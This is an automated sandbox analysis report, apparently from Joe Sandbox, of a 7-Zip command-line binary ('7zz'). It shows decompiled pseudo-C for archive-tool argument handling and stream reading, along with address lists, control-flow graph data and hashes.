2680->2679 2689->2618 2693 41072d 2689->2693 2690->2618 2693->2618
                                                                                  C-Code - Quality: 90%
                                                                                  			E0041035D(void* __ecx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t192;
				char* _t200;
				intOrPtr _t201;
				intOrPtr _t202;
				signed char _t206;
				char _t212;
				signed char _t216;
				char _t217;
				void* _t218;
				void* _t220;
				intOrPtr* _t225;
				void* _t228;
				void* _t230;
				signed char _t233;
				signed char _t234;
				signed int _t235;
				signed char _t243;
				char* _t247;
				signed int _t248;
				signed int _t249;
				char _t251;
				char* _t252;
				signed char _t253;
				char* _t258;
				signed char _t268;
				char* _t269;
				char* _t291;
				char _t319;
				void* _t331;
				intOrPtr _t357;
				signed int _t363;
				void* _t364;
				signed int _t365;
				char _t375;
				void* _t421;
				void* _t422;
				signed int _t441;
				signed int _t443;
				char* _t444;
				char* _t447;
				void* _t449;

				L0046B890(E00474174, _t449);
				_t331 = __ecx;
				_t192 =  *((intOrPtr*)(__ecx + 0x10));
				_t454 = _t192 - 1;
				 *((intOrPtr*)(_t449 - 0x24)) = _t192;
				if(_t192 < 1) {
					L0040FFF2();
				}
				_t447 =  *(_t449 + 8);
				if(E00410A4C( *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)))),  &(_t447[0x20]), _t454) == 0) {
					L0040FFF2();
				}
				_t447[0x40] =  *((intOrPtr*)(L004071F7(_t331, 0x1c)));
				_t447[0x41] =  *((intOrPtr*)(L004071F7(_t331, 0x1f)));
				if( *(L004071F7(_t331, 0x1e)) != 0) {
					 *0x490adc = L004071F7(_t331, 0x1e) & 0xffffff00 |  *((intOrPtr*)(_t326 + 0x18)) < 0x00000000;
				}
				_t200 = L004071F7(_t331, 0x12);
				_t459 =  *_t200;
				if( *_t200 == 0) {
					 *(_t449 - 0x18) = 2;
				} else {
					 *(_t449 - 0x18) = E00410A39( *((intOrPtr*)(L004071F7(_t331, 0x12) + 0x18)));
				}
				_push(0xffffffff);
				_t421 = 0x1b;
				_t201 = E0041191E(_t331, _t421, _t459);
				_push(0xfde9);
				_t422 = 0x1a;
				 *0x48b6f8 = _t201;
				_t202 = E0041191E(_t331, _t422, _t459);
				 *(_t449 - 0x20) =  *(_t449 - 0x20) & 0x00000000;
				 *((intOrPtr*)(_t449 - 0x14)) = _t202;
				if( *((char*)(L004071F7(_t331, 0xb))) != 0) {
					_push( *((intOrPtr*)(_t449 - 0x14)));
					 *(_t449 - 0x20) = 1;
					_push( *(_t449 - 0x18));
					_push(1);
					E00410CA4( &(_t447[0xc]), L004071F7(_t331, 0xb) + 4);
				}
				if( *((char*)(L004071F7(_t331, 0xc))) != 0) {
					_push( *((intOrPtr*)(_t449 - 0x14)));
					_push( *(_t449 - 0x18));
					_push(0);
					E00410CA4( &(_t447[0xc]), L004071F7(_t331, 0xc) + 4);
				}
				_t441 = 1;
				if( *((char*)(L004071F7(_t331, 0xf))) != 0) {
					L17:
					_t26 = _t449 + 0xb;
					 *_t26 =  *(_t449 + 0xb) & 0x00000000;
					__eflags =  *_t26;
					L18:
					_t206 = L0040FE22( &(_t447[0x20]));
					 *(_t449 - 0xe) = _t206;
					if(_t206 != 0 || _t447[0x20] == 6) {
						__eflags = _t447[5];
						 *(_t449 - 0xd) = 1;
						if(_t447[5] != 0) {
							_t35 = _t449 + 0xb;
							 *_t35 =  *(_t449 + 0xb) & 0x00000000;
							__eflags =  *_t35;
						}
					} else {
						 *(_t449 - 0xd) =  *(_t449 - 0xd) & _t206;
					}
					if( *(_t449 + 0xb) != 0) {
						if( *((intOrPtr*)(_t449 - 0x24)) <= 1) {
							L0040FFF2();
						}
						_t441 = 2;
						E00401E26( &(_t447[0x24]),  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)) + 4)));
						if(_t447[0x28] == 0) {
							L0040FFF2();
						}
					}
					_push( *((intOrPtr*)(_t449 - 0x14)));
					_push( *(_t449 - 0x20));
					 *(_t449 - 0x1c) =  &(_t447[0xc]);
					_push( *(_t449 - 0x18));
					_push(_t331 + 8);
					E00410B06(_t441,  &(_t447[0xc]));
					_t447[8] =  *((intOrPtr*)(L004071F7(_t331, 6)));
					_t212 =  *((intOrPtr*)(L004071F7(_t331, 7)));
					_t447[0x30] = _t212;
					if(_t212 != 0) {
						E00401E26( &(_t447[0x34]),  *((intOrPtr*)( *((intOrPtr*)(L004071F7(_t331, 7) + 0x10)))));
					}
					_t447[9] =  *((intOrPtr*)(L004071F7(_t331, 0x18)));
					if( *((char*)(L004071F7(_t331, 5))) != 0) {
						E00401E26( &(_t447[0x168]),  *((intOrPtr*)( *((intOrPtr*)(L004071F7(_t331, 5) + 0x10)))));
					}
					if( *(_t449 - 0xd) == 0) {
						_t216 = L0040FE46( &(_t447[0x20]));
						__eflags = _t216;
						if(_t216 == 0) {
							_t217 = _t447[0x20];
							__eflags = _t217 - 7;
							if(_t217 != 7) {
								__eflags = _t217 - 8;
								if(_t217 != 8) {
									L0040FFF2();
								}
								goto L110;
							}
							_t447[0x17c] = _t447[0x17c] | 0xffffffff;
							_t447[0x180] = _t447[0x180] | 0xffffffff;
							__eflags = _t441 -  *((intOrPtr*)(_t449 - 0x24));
							_t424 =  &(_t447[0x178]);
							_t447[0x178] = 1;
							if(_t441 <  *((intOrPtr*)(_t449 - 0x24))) {
								_t243 = E004119B8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)) + _t441 * 4)))), _t424);
								__eflags = _t243;
								if(_t243 == 0) {
									L0040FFF2();
								}
							}
							_t443 = 0;
							_t220 = L004071F7(_t331, 8);
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) > 0) {
								do {
									L004039C0(_t449 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(L004071F7(_t331, 8) + 0x10)) + _t443 * 4)));
									 *(_t449 - 4) = 3;
									L00407ED0( *((intOrPtr*)(_t449 - 0x30)));
									__eflags =  *((intOrPtr*)(_t449 - 0x2c)) - 2;
									if( *((intOrPtr*)(_t449 - 0x2c)) < 2) {
										L0040FFF2();
									}
									_t225 =  *((intOrPtr*)(_t449 - 0x30));
									_t357 =  *_t225;
									__eflags = _t357 - 0x44;
									if(_t357 != 0x44) {
										__eflags = _t357 - 0x4d;
										if(_t357 != 0x4d) {
											L100:
											L0040FFF2();
											goto L101;
										}
										__eflags =  *((short*)(_t225 + 2)) - 0x54;
										if( *((short*)(_t225 + 2)) != 0x54) {
											__eflags = _t357 - 0x4d;
											if(_t357 != 0x4d) {
												goto L100;
											}
											__eflags =  *((short*)(_t225 + 2)) - 0x3d;
											if( *((short*)(_t225 + 2)) != 0x3d) {
												goto L100;
											}
											__eflags =  *((short*)(_t225 + 4));
											if( *((short*)(_t225 + 4)) == 0) {
												goto L102;
											}
											_t230 = L004072C9(_t449 - 0x30, _t449 - 0x3c, 2);
											 *(_t449 - 4) = 4;
											E00401E26( &(_t447[0x184]), _t230);
											L00407A18( *((intOrPtr*)(_t449 - 0x3c)));
											goto L101;
										}
										__eflags =  *((short*)(_t225 + 4)) - 0x3d;
										_t363 = 2;
										if( *((short*)(_t225 + 4)) == 0x3d) {
											_t363 = 3;
										}
										__eflags =  *((short*)(_t225 + _t363 * 2));
										_t364 = _t225 + _t363 * 2;
										if( *((short*)(_t225 + _t363 * 2)) == 0) {
											goto L102;
										} else {
											_t233 = E004119B8(_t364,  &(_t447[0x17c]));
											__eflags = _t233;
											if(_t233 != 0) {
												goto L101;
											}
											goto L100;
										}
									} else {
										__eflags =  *((short*)(_t225 + 2)) - 0x3d;
										_t365 = 1;
										if( *((short*)(_t225 + 2)) == 0x3d) {
											_t365 = 2;
										}
										_t234 = E004119B8(_t225 + _t365 * 2, _t449 + 8);
										__eflags = _t234;
										if(_t234 == 0) {
											L0040FFF2();
										}
										__eflags =  *(_t449 + 8) - 0x1f;
										if( *(_t449 + 8) > 0x1f) {
											L0040FFF2();
										}
										_t235 = 1;
										_t447[0x180] = _t235 <<  *(_t449 + 8);
										L101:
										_t225 =  *((intOrPtr*)(_t449 - 0x30));
									}
									L102:
									 *(_t449 - 4) =  *(_t449 - 4) | 0xffffffff;
									L00407A18(_t225);
									_t443 = _t443 + 1;
									_t228 = L004071F7(_t331, 8);
									__eflags = _t443 -  *((intOrPtr*)(_t228 + 0xc));
								} while (_t443 <  *((intOrPtr*)(_t228 + 0xc)));
							}
							goto L110;
						}
						_t444 =  &(_t447[0x90]);
						_push(_t444);
						E0041124B(_t447[0x20], _t331);
						E004117BD(_t331,  &(_t444[4]), __eflags);
						_t247 = L004071F7(_t331, 0x1d);
						__eflags =  *_t247;
						if( *_t247 != 0) {
							_t444[0x98] = 1;
						}
						_t248 = L004071F7(_t331, 4);
						__eflags =  *_t248;
						_t249 = _t248 & 0xffffff00 |  *_t248 == 0x00000000;
						__eflags = _t249;
						_t447[0x174] = _t249;
						if(_t249 == 0) {
							L66:
							_t251 =  *((intOrPtr*)(L004071F7(_t331, 0x17)));
							__eflags = _t251;
							_t444[0xa9] = _t251;
							if(_t251 != 0) {
								E00401E26( &(_t444[0xac]),  *((intOrPtr*)( *((intOrPtr*)(L004071F7(_t331, 0x17) + 0x10)))));
								__eflags = _t444[0xb0];
								if(_t444[0xb0] > 0) {
									__eflags =  *(_t444[0xac]) - 0x2e;
									if( *(_t444[0xac]) == 0x2e) {
										_t444[0xaa] = 1;
										L004075A5( &(_t444[0xac]), 0, 1);
									}
								}
							}
							_t252 =  &(_t444[0xa8]);
							 *_t252 = _t447[6];
							_t253 =  *_t252;
							_t375 = _t447[5];
							__eflags = _t253;
							_t444[0x99] = _t375;
							if(_t253 != 0) {
								__eflags = _t444[0xa9];
								if(_t444[0xa9] != 0) {
									 *(_t449 + 8) = "stdout mode and email mode cannot be combined";
									_t253 = L0046B8F4(_t449 + 8, 0x47cf70);
								}
								__eflags = _t253;
								if(_t253 != 0) {
									__eflags = _t447[3];
									if(_t447[3] != 0) {
										_t258 =  *0x48ba30; // 0x48bab0
										 *(_t449 + 8) = _t258;
										L0046B8F4(_t449 + 8, 0x47d358);
									}
								}
							}
							__eflags = _t375;
							if(_t375 != 0) {
								E00401E26( &(_t444[0x9c]),  *((intOrPtr*)( *((intOrPtr*)(L004071F7(_t331, 0x14) + 0x10)))));
							}
							E00411046( *(_t449 - 0x1c));
							goto L110;
						} else {
							_t268 = _t447[6];
							__eflags = _t268;
							if(_t268 == 0) {
								L64:
								__eflags = _t447[3];
								if(_t447[3] != 0) {
									goto L66;
								}
								L65:
								_t122 =  &(_t447[0x174]);
								 *_t122 = _t447[0x174] & 0x00000000;
								__eflags =  *_t122;
								goto L66;
							}
							__eflags = _t447[4];
							if(_t447[4] == 0) {
								goto L65;
							}
							__eflags = _t268;
							if(_t268 != 0) {
								goto L66;
							}
							goto L64;
						}
					} else {
						_t269 =  *(_t449 - 0x1c);
						if(_t269[8] != 1 ||  *((intOrPtr*)( *(_t269[0xc]) + 4)) != 0) {
							L0040FFFD("Cannot use absolute pathnames for this command");
						}
						E00405B9F(_t449 - 0x50);
						 *((intOrPtr*)(_t449 - 0x50)) = 0x47a680;
						 *(_t449 - 4) =  *(_t449 - 4) & 0x00000000;
						if( *((char*)(L004071F7(_t331, 0xd))) != 0) {
							_push( *((intOrPtr*)(_t449 - 0x14)));
							_push(2);
							_push(1);
							E00410CA4(_t449 - 0x50, L004071F7(_t331, 0xd) + 4);
						}
						if( *((char*)(L004071F7(_t331, 0xe))) != 0) {
							_push( *((intOrPtr*)(_t449 - 0x14)));
							_push(2);
							_push(0);
							E00410CA4(_t449 - 0x50, L004071F7(_t331, 0xe) + 4);
						}
						if( *(_t449 + 0xb) != 0) {
							E00410AC9(_t449 - 0x50,  &(_t447[0x24]), 1, 2);
						}
						E00411046(_t449 - 0x50);
						E0040925B(_t449 - 0x50);
						if(_t447[5] == 0) {
							_push( &(_t447[0x68]));
							E0041003E(_t331, _t449 - 0x50,  &(_t447[0x54]), _t441, __eflags); // executed
						} else {
							L004039C0(_t449 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(L004071F7(_t331, 0x14) + 0x10)))));
							_push(_t449 - 0x30);
							 *(_t449 - 4) = 1;
							L00406796( &(_t447[0x54]));
							_push(_t449 - 0x30);
							L00406796( &(_t447[0x68]));
							 *(_t449 - 4) =  *(_t449 - 4) & 0x00000000;
							L00407A18( *((intOrPtr*)(_t449 - 0x30)));
						}
						_t483 =  *(_t449 - 0xe);
						if( *(_t449 - 0xe) != 0) {
							E004117BD(_t331,  &(_t447[0x7c]), _t483);
							if(_t447[6] != 0 && _t447[3] != 0 && _t447[4] != 0) {
								_t291 =  *0x48ba34; // 0x48ba74
								 *(_t449 + 8) = _t291;
								L0046B8F4(_t449 + 8, 0x47d358);
							}
							if( *((char*)(L004071F7(_t331, 9))) != 0) {
								E00401E26( &(_t447[0x44]),  *((intOrPtr*)( *((intOrPtr*)(L004071F7(_t331, 9) + 0x10)))));
								L0040BEB9( &(_t447[0x44]));
							}
							_t447[0x50] = _t447[0x50] & 0x00000000;
							if( *((char*)(L004071F7(_t331, 0x16))) == 0) {
								__eflags = _t447[8];
								if(_t447[8] != 0) {
									_t447[0x50] = 1;
								}
							} else {
								_t447[0x50] =  *(0x48b704 +  *(L004071F7(_t331, 0x16) + 0x18) * 4);
							}
						}
						 *((intOrPtr*)(_t449 - 0x50)) = 0x47a680;
						 *(_t449 - 4) = 2;
						E0040862D();
						 *(_t449 - 4) =  *(_t449 - 4) | 0xffffffff;
						E00408604(_t449 - 0x50);
						L110:
						_t218 = E0040925B( *(_t449 - 0x1c));
						 *[fs:0x0] =  *((intOrPtr*)(_t449 - 0xc));
						return _t218;
					}
				}
				_t319 = _t447[0x20];
				if(_t319 == 7 || _t319 == 8) {
					goto L17;
				} else {
					 *(_t449 + 0xb) = 1;
					goto L18;
				}
			}














































                                                                                  0x00410362
                                                                                  0x0041036b
                                                                                  0x0041036f
                                                                                  0x00410372
                                                                                  0x00410375
                                                                                  0x00410378
                                                                                  0x0041037a
                                                                                  0x0041037a
                                                                                  0x00410382
                                                                                  0x00410391
                                                                                  0x00410393
                                                                                  0x00410393
                                                                                  0x004103a7
                                                                                  0x004103b5
                                                                                  0x004103c0
                                                                                  0x004103d2
                                                                                  0x004103d2
                                                                                  0x004103db
                                                                                  0x004103e0
                                                                                  0x004103e3
                                                                                  0x004103fb
                                                                                  0x004103e5
                                                                                  0x004103f6
                                                                                  0x004103f6
                                                                                  0x00410402
                                                                                  0x00410406
                                                                                  0x00410409
                                                                                  0x0041040e
                                                                                  0x00410415
                                                                                  0x00410418
                                                                                  0x0041041d
                                                                                  0x00410422
                                                                                  0x0041042a
                                                                                  0x00410435
                                                                                  0x00410437
                                                                                  0x0041043c
                                                                                  0x00410440
                                                                                  0x00410443
                                                                                  0x00410454
                                                                                  0x00410454
                                                                                  0x00410465
                                                                                  0x00410467
                                                                                  0x0041046c
                                                                                  0x0041046f
                                                                                  0x00410480
                                                                                  0x00410480
                                                                                  0x00410489
                                                                                  0x00410494
                                                                                  0x004104a9
                                                                                  0x004104a9
                                                                                  0x004104a9
                                                                                  0x004104a9
                                                                                  0x004104ad
                                                                                  0x004104b0
                                                                                  0x004104b7
                                                                                  0x004104ba
                                                                                  0x004104c7
                                                                                  0x004104cb
                                                                                  0x004104cf
                                                                                  0x004104d1
                                                                                  0x004104d1
                                                                                  0x004104d1
                                                                                  0x004104d1
                                                                                  0x004104c2
                                                                                  0x004104c2
                                                                                  0x004104c2
                                                                                  0x004104d9
                                                                                  0x004104df
                                                                                  0x004104e1
                                                                                  0x004104e1
                                                                                  0x004104eb
                                                                                  0x004104f2
                                                                                  0x004104fb
                                                                                  0x004104fd
                                                                                  0x004104fd
                                                                                  0x004104fb
                                                                                  0x00410502
                                                                                  0x0041050d
                                                                                  0x00410510
                                                                                  0x00410513
                                                                                  0x00410516
                                                                                  0x00410517
                                                                                  0x0041052b
                                                                                  0x00410533
                                                                                  0x00410537
                                                                                  0x0041053a
                                                                                  0x0041054d
                                                                                  0x0041054d
                                                                                  0x00410561
                                                                                  0x0041056c
                                                                                  0x00410582
                                                                                  0x00410582
                                                                                  0x0041058b
                                                                                  0x0041075e
                                                                                  0x00410763
                                                                                  0x00410765
                                                                                  0x004108ae
                                                                                  0x004108b1
                                                                                  0x004108b4
                                                                                  0x00410a16
                                                                                  0x00410a19
                                                                                  0x00410a1b
                                                                                  0x00410a1b
                                                                                  0x00000000
                                                                                  0x00410a19
                                                                                  0x004108ba
                                                                                  0x004108c1
                                                                                  0x004108c8
                                                                                  0x004108cb
                                                                                  0x004108d1
                                                                                  0x004108d7
                                                                                  0x004108e3
                                                                                  0x004108e8
                                                                                  0x004108ea
                                                                                  0x004108ec
                                                                                  0x004108ec
                                                                                  0x004108ea
                                                                                  0x004108f5
                                                                                  0x004108f7
                                                                                  0x004108fc
                                                                                  0x004108ff
                                                                                  0x00410905
                                                                                  0x00410917
                                                                                  0x0041091f
                                                                                  0x00410926
                                                                                  0x0041092b
                                                                                  0x0041092f
                                                                                  0x00410931
                                                                                  0x00410931
                                                                                  0x00410936
                                                                                  0x00410939
                                                                                  0x0041093c
                                                                                  0x00410940
                                                                                  0x0041097e
                                                                                  0x00410982
                                                                                  0x004109b1
                                                                                  0x004109b1
                                                                                  0x00000000
                                                                                  0x004109b1
                                                                                  0x00410984
                                                                                  0x00410989
                                                                                  0x004109d9
                                                                                  0x004109dd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004109df
                                                                                  0x004109e4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004109e6
                                                                                  0x004109eb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004109f6
                                                                                  0x00410a02
                                                                                  0x00410a06
                                                                                  0x00410a0e
                                                                                  0x00000000
                                                                                  0x00410a13
                                                                                  0x0041098b
                                                                                  0x00410992
                                                                                  0x00410993
                                                                                  0x00410997
                                                                                  0x00410997
                                                                                  0x00410998
                                                                                  0x0041099d
                                                                                  0x004109a0
                                                                                  0x00000000
                                                                                  0x004109a2
                                                                                  0x004109a8
                                                                                  0x004109ad
                                                                                  0x004109af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004109af
                                                                                  0x00410942
                                                                                  0x00410942
                                                                                  0x00410949
                                                                                  0x0041094a
                                                                                  0x0041094e
                                                                                  0x0041094e
                                                                                  0x00410955
                                                                                  0x0041095a
                                                                                  0x0041095c
                                                                                  0x0041095e
                                                                                  0x0041095e
                                                                                  0x00410963
                                                                                  0x00410967
                                                                                  0x00410969
                                                                                  0x00410969
                                                                                  0x00410973
                                                                                  0x00410976
                                                                                  0x004109b6
                                                                                  0x004109b6
                                                                                  0x004109b6
                                                                                  0x004109b9
                                                                                  0x004109b9
                                                                                  0x004109be
                                                                                  0x004109c4
                                                                                  0x004109c9
                                                                                  0x004109ce
                                                                                  0x004109ce
                                                                                  0x004109d7
                                                                                  0x00000000
                                                                                  0x004108ff
                                                                                  0x0041076e
                                                                                  0x00410774
                                                                                  0x00410777
                                                                                  0x00410781
                                                                                  0x0041078a
                                                                                  0x0041078f
                                                                                  0x00410792
                                                                                  0x00410794
                                                                                  0x00410794
                                                                                  0x0041079f
                                                                                  0x004107a4
                                                                                  0x004107a7
                                                                                  0x004107aa
                                                                                  0x004107ac
                                                                                  0x004107b2
                                                                                  0x004107d2
                                                                                  0x004107db
                                                                                  0x004107dd
                                                                                  0x004107df
                                                                                  0x004107e5
                                                                                  0x004107fc
                                                                                  0x00410801
                                                                                  0x00410808
                                                                                  0x00410810
                                                                                  0x00410814
                                                                                  0x00410820
                                                                                  0x00410827
                                                                                  0x00410827
                                                                                  0x00410814
                                                                                  0x00410808
                                                                                  0x0041082f
                                                                                  0x00410835
                                                                                  0x00410837
                                                                                  0x00410839
                                                                                  0x0041083c
                                                                                  0x0041083e
                                                                                  0x00410844
                                                                                  0x00410846
                                                                                  0x0041084d
                                                                                  0x00410858
                                                                                  0x0041085f
                                                                                  0x0041085f
                                                                                  0x00410864
                                                                                  0x00410866
                                                                                  0x00410868
                                                                                  0x0041086c
                                                                                  0x0041086e
                                                                                  0x00410878
                                                                                  0x0041087f
                                                                                  0x0041087f
                                                                                  0x0041086c
                                                                                  0x00410866
                                                                                  0x00410884
                                                                                  0x00410886
                                                                                  0x0041089c
                                                                                  0x0041089c
                                                                                  0x004108a4
                                                                                  0x00000000
                                                                                  0x004107b4
                                                                                  0x004107b4
                                                                                  0x004107b7
                                                                                  0x004107b9
                                                                                  0x004107c5
                                                                                  0x004107c5
                                                                                  0x004107c9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004107cb
                                                                                  0x004107cb
                                                                                  0x004107cb
                                                                                  0x004107cb
                                                                                  0x00000000
                                                                                  0x004107cb
                                                                                  0x004107bb
                                                                                  0x004107bf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004107c1
                                                                                  0x004107c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004107c3
                                                                                  0x00410591
                                                                                  0x00410591
                                                                                  0x00410598
                                                                                  0x004105aa
                                                                                  0x004105aa
                                                                                  0x004105b2
                                                                                  0x004105b7
                                                                                  0x004105be
                                                                                  0x004105ce
                                                                                  0x004105d0
                                                                                  0x004105d5
                                                                                  0x004105d7
                                                                                  0x004105e8
                                                                                  0x004105e8
                                                                                  0x004105f9
                                                                                  0x004105fb
                                                                                  0x00410600
                                                                                  0x00410602
                                                                                  0x00410613
                                                                                  0x00410613
                                                                                  0x0041061c
                                                                                  0x00410628
                                                                                  0x00410628
                                                                                  0x00410630
                                                                                  0x00410638
                                                                                  0x00410641
                                                                                  0x0041068a
                                                                                  0x0041068e
                                                                                  0x00410643
                                                                                  0x00410654
                                                                                  0x0041065f
                                                                                  0x00410660
                                                                                  0x00410664
                                                                                  0x0041066f
                                                                                  0x00410670
                                                                                  0x00410678
                                                                                  0x0041067c
                                                                                  0x00410681
                                                                                  0x00410693
                                                                                  0x00410697
                                                                                  0x004106a2
                                                                                  0x004106ab
                                                                                  0x004106b9
                                                                                  0x004106c3
                                                                                  0x004106ca
                                                                                  0x004106ca
                                                                                  0x004106db
                                                                                  0x004106f1
                                                                                  0x004106f8
                                                                                  0x004106f8
                                                                                  0x004106fd
                                                                                  0x0041070d
                                                                                  0x00410727
                                                                                  0x0041072b
                                                                                  0x0041072d
                                                                                  0x0041072d
                                                                                  0x0041070f
                                                                                  0x00410722
                                                                                  0x00410722
                                                                                  0x0041070d
                                                                                  0x00410734
                                                                                  0x0041073e
                                                                                  0x00410745
                                                                                  0x0041074a
                                                                                  0x00410751
                                                                                  0x00410a20
                                                                                  0x00410a23
                                                                                  0x00410a2e
                                                                                  0x00410a36
                                                                                  0x00410a36
                                                                                  0x0041058b
                                                                                  0x00410496
                                                                                  0x0041049c
                                                                                  0x00000000
                                                                                  0x004104a3
                                                                                  0x004104a3
                                                                                  0x00000000
                                                                                  0x004104a3

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00410362
                                                                                    • Part of subcall function 0041003E: __EH_prolog.LIBCMT ref: 00410043
                                                                                  Strings
                                                                                  • Cannot use absolute pathnames for this command, xrefs: 004105A5
                                                                                  • 59@, xrefs: 0041036E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: 59@$Cannot use absolute pathnames for this command
                                                                                  • API String ID: 3519838083-753490679
                                                                                  • Opcode ID: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
                                                                                  • Instruction ID: 8adad491b5bf5222f818b6dcdc2d6027f4997ee1019a1a956a15da55c14c090b
                                                                                  • Opcode Fuzzy Hash: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
                                                                                  • Instruction Fuzzy Hash: D022C330A043849EDB25EB65C851BEE7BA1AF45308F04446FE1562F2D3CBBCA9C8C759
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042D33C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2697 42d33c-42d35a __EH_prolog call 40fac0 2699 42d35f-42d361 2697->2699 2700 42d367-42d370 call 42d51a 2699->2700 2701 42d4cc-42d4da 2699->2701 2704 42d372-42d374 2700->2704 2705 42d379-42d3af call 40fa26 call 46c5c0 2700->2705 2704->2701 2710 42d3b2-42d3b7 2705->2710 2711 42d3d6-42d3f8 2710->2711 2712 42d3b9-42d3c6 2710->2712 2719 42d4b8 2711->2719 2720 42d3fe-42d406 2711->2720 2713 42d47c-42d47f 2712->2713 2714 42d3cc 2712->2714 2717 42d4ba-42d4ca call 407a18 2713->2717 2714->2711 2715 42d3ce-42d3d0 2714->2715 2715->2711 2715->2713 2717->2701 2719->2717 2720->2713 2722 42d408-42d40c 2720->2722 2722->2711 2723 42d40e-42d41e 2722->2723 2724 42d420 2723->2724 2725 42d477-42d47a 2723->2725 2726 42d428 2724->2726 2727 42d45b-42d472 call 46bab0 2725->2727 2729 42d42b-42d42f 2726->2729 2727->2710 2731 42d431-42d433 2729->2731 2732 42d43b 2729->2732 2733 42d435-42d439 2731->2733 2734 42d43d 2731->2734 2732->2734 2733->2729 2734->2727 2735 42d43f-42d448 call 42d4dd 2734->2735 2738 42d481-42d4b4 call 46c5c0 2735->2738 2739 42d44a-42d453 2735->2739 2738->2719 2740 42d422-42d425 2739->2740 2741 42d455-42d458 2739->2741 2740->2726 2741->2727
                                                                                  C-Code - Quality: 95%
                                                                                  			E0042D33C(void* __ecx, void* __eflags) {
				intOrPtr _t57;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;

				L0046B890(0x4774d0, _t116);
				_t119 = _t118 - 0x20;
				_t113 = __ecx;
				_t83 = __ecx + 0x28;
				_t107 = 0x20;
				_t57 = E0040FAC0(__eflags, _t107); // executed
				if(_t57 == 0) {
					if(E0042D51A(_t83) == 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
						 *((intOrPtr*)(_t116 - 0x28)) = 0;
						 *((intOrPtr*)(_t116 - 0x24)) = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						L0040FA26(_t116 - 0x2c, 0x10000);
						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
						E0046C5C0( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
						_t109 =  *((intOrPtr*)(_t113 + 0x20));
						_t85 =  *((intOrPtr*)(_t113 + 0x24));
						_t121 = _t119 + 0xc;
						while(1) {
							L4:
							_t100 =  *((intOrPtr*)(_t116 + 0xc));
							__eflags = _t100;
							if(_t100 == 0) {
								goto L8;
							}
							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
							asm("sbb eax, [esi+0x24]");
							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
							if(__eflags > 0) {
								L25:
								_t115 = 1;
							} else {
								if(__eflags < 0) {
									goto L8;
								} else {
									__eflags = _t95 -  *_t100;
									if(_t95 >  *_t100) {
										goto L25;
									} else {
										while(1) {
											L8:
											_t65 =  *((intOrPtr*)(_t116 - 0x10));
											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
											__eflags = _t67;
											if(_t67 != 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t116 - 0x20));
											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
											__eflags = _t69;
											if(_t69 == 0) {
												goto L25;
											} else {
												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
													continue;
												} else {
													_t104 = 0;
